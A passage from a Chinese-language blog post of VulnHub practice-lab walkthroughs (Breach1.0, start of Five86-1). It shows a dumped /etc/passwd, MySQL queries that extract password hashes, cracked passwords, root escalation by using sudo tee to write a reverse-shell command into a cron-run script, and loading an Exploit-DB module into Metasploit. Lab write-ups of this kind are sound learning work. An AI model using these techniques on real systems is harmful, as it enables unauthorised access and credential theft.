<p>查看一下系统用户：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:&#x2F;root:&#x2F;bin&#x2F;bash</span><br><span class="line">daemon:x:1:1:daemon:&#x2F;usr&#x2F;sbin:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">bin:x:2:2:bin:&#x2F;bin:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">sys:x:3:3:sys:&#x2F;dev:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">sync:x:4:65534:sync:&#x2F;bin:&#x2F;bin&#x2F;sync</span><br><span class="line">games:x:5:60:games:&#x2F;usr&#x2F;games:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">man:x:6:12:man:&#x2F;var&#x2F;cache&#x2F;man:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">lp:x:7:7:lp:&#x2F;var&#x2F;spool&#x2F;lpd:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">mail:x:8:8:mail:&#x2F;var&#x2F;mail:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">news:x:9:9:news:&#x2F;var&#x2F;spool&#x2F;news:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">uucp:x:10:10:uucp:&#x2F;var&#x2F;spool&#x2F;uucp:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">proxy:x:13:13:proxy:&#x2F;bin:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">www-data:x:33:33:www-data:&#x2F;var&#x2F;www:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">backup:x:34:34:backup:&#x2F;var&#x2F;backups:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:&#x2F;var&#x2F;list:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">irc:x:39:39:ircd:&#x2F;var&#x2F;run&#x2F;ircd:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):&#x2F;var&#x2F;lib&#x2F;gnats:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">nobody:x:65534:65534:nobody:&#x2F;nonexistent:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">libuuid:x:100:101::&#x2F;var&#x2F;lib&#x2F;libuuid:</span><br><span class="line">syslog:x:101:104::&#x2F;home&#x2F;syslog:&#x2F;bin&#x2F;false</span><br><span class="line">messagebus:x:102:106::&#x2F;var&#x2F;run&#x2F;dbus:&#x2F;bin&#x2F;false</span><br><span class="line">landscape:x:103:109::&#x2F;var&#x2F;lib&#x2F;landscape:&#x2F;bin&#x2F;false</span><br><span class="line">milton:x:1000:1000:Milton_Waddams,,,:&#x2F;home&#x2F;milton:&#x2F;bin&#x2F;bash</span><br><span class="line">tomcat6:x:104:112::&#x2F;usr&#x2F;share&#x2F;tomcat6:&#x2F;bin&#x2F;false</span><br><span class="line">colord:x:105:114:colord colour management daemon,,,:&#x2F;var&#x2F;lib&#x2F;colord:&#x2F;bin&#x2F;false</span><br><span class="line">mysql:x:106:116:MySQL Server,,,:&#x2F;nonexistent:&#x2F;bin&#x2F;false</span><br><span class="line">blumbergh:x:1001:1001:Bill Lumbergh,,,:&#x2F;home&#x2F;blumbergh:&#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></figure>

<p>有两个用户很有意思：milton &amp; blumbergh（它俩都有 /bin/bash）。可以在 /var/www/5446 中发现两个有趣的 php 文件：</p>
<p><img src="https://i.loli.net/2021/05/13/QHYwarZ3W9FDOJm.png"></p>
<p>我们查看一下，里面有数据库用户 root 的信息：</p>
<p><img src="https://i.loli.net/2021/05/13/rCIt6ZE58MqimnY.png"></p>
<p>密码为空，我们直接用 mysql -uroot -p 就可以登入：</p>
<p><img src="https://i.loli.net/2021/05/13/bZHUfsgpeAzFi47.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">show databases;</span><br><span class="line">use mysql;</span><br><span class="line">select user,password from user;</span><br></pre></td></tr></table></figure>

<p>得到用户密码表：</p>
<table>
<thead>
<tr>
<th>user</th>
<th>password</th>
</tr>
</thead>
<tbody><tr>
<td>root</td>
<td></td>
</tr>
<tr>
<td>milton</td>
<td>6450d89bd3aff1d893b85d3ad65d2ec2</td>
</tr>
<tr>
<td>root</td>
<td></td>
</tr>
<tr>
<td>root</td>
<td></td>
</tr>
<tr>
<td>debian-sys-maint</td>
<td>*A9523939F1B2F3E72A4306C34F225ACF09590878</td>
</tr>
</tbody></table>
<p>得到 milton 的密码 hash 为 6450d89bd3aff1d893b85d3ad65d2ec2，经解密得到：<code>thelaststraw</code>，彳亍… <code>su milton</code>，再输入密码，这样就提权到 milton 了。在历史命令中发现有 su 到 blumbergh 用户，寻找 blumbergh 用户密码。</p>
<p>在 <a target="_blank" rel="noopener" href="http://192.168.110.140/images/bill.png">http://192.168.110.140/images/bill.png</a> 的 exif 中存在某神秘字符串 <code>coffeestains</code>，尝试作为 blumbergh 用户密码登录。成功登录，查看一下权限：</p>
<p><img src="https://i.loli.net/2021/05/13/iEvmcHzBZ6uaL1I.png"></p>
<p><img src="https://i.loli.net/2021/05/13/4Bw1tUfXdkmvNQ6.png"></p>
<p>可以发现 <code>/usr/share/cleanup/tidyup.sh</code> 没有写入权限，但是可以用 root 权限执行 tee 命令把反弹 shell 命令写入然后执行。（tee命令用于读取标准输入的数据，并将其内容输出成文件）</p>
<p>看一下 tidyup.sh 里面是啥吧：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /var/lib/tomcat6/webapps &amp;&amp; find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf</span><br></pre></td></tr></table></figure>

<p>每隔三分钟就会清理 webapps 目录下的所有文件，所以之前传的🐎如果不反弹 shell 的话很快就会被删掉。</p>
<p>接下来就是写入命令弹 shell 了：（同时另外开一个 terminal 来接受 shell）</p>
<p><img src="https://i.loli.net/2021/05/13/7PcaTGvr3MXZBwm.png"></p>
<p><img src="https://i.loli.net/2021/05/13/FvfjmRVUbPzk5WX.png"></p>
<p>可以发现我们已经提权至了 root，后面 flag 什么的便不重要了。</p>
<h2 id="Five86-1"><a href="#Five86-1" class="headerlink" title="Five86-1"></a>Five86-1</h2><p>Nmap 扫一下。</p>
<p><img src="https://i.loli.net/2021/05/13/WTVzvbgFcrksuU2.png" alt="U_MH_Q9JAM05PC__GW77DJ5.png"></p>
<p>10000 端口开了个 <code>Webmin httpd 1.920</code>，可以搜一下有无 exp。（Webmin 是一个很好的 UNIX web 管理）</p>
<p><img src="https://i.loli.net/2021/05/14/x4BjoNLF6eKCp1v.png"></p>
<p>robots.txt 里发现 /ona 路由，访问一下，发现是 OpenNetAdmin，搜一下有无 exp：</p>
<p><img src="https://i.loli.net/2021/05/14/XfprCJUjvYn7TIK.png"></p>
<p><img src="https://i.loli.net/2021/05/14/HuPBYdxZX9LylKs.png"></p>
<p>把 exp 复制出来丢到 msf 里面，直接打一发：</p>
<p><code>cp /usr/share/exploitdb/exploits/php/webapps/47772.rb /usr/share/metasploit-framework/modules/exploits</code></p>
<p><img src="https://i.loli.net/2021/05/14/IFRLAYWqaoGtS8v.png" alt="2VVE3EMW08WLWS__PGPW_Z9.png"></p>
<p><img src="https://i.loli.net/2021/05/14/vHzlJdCqMFou97O.jpg"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/links/">links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Me-and-My-Girlfriend-1"><span class="toc-number">1.</span> <span class="toc-text">Me and My Girlfriend: 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Billu-b0x"><span class="toc-number">2.</span> <span class="toc-text">Billu_b0x</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Breach1-0"><span class="toc-number">3.</span> <span class="toc-text">Breach1.0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Five86-1"><span class="toc-number">4.</span> <span class="toc-text">Five86-1</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&text=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&is_video=false&description=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透学习入门-VulnHub自闭之旅&body=Check out this article: http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&title=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&name=渗透学习入门-VulnHub自闭之旅&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/10/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-VulnHub%E8%87%AA%E9%97%AD%E4%B9%8B%E6%97%85/&t=渗透学习入门-VulnHub自闭之旅"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021
    Du1
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/links/">links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
         <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
         <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.bootcdn.net/ajax/libs/font-awesome/5.15.2/css/all.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.bootcdn.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
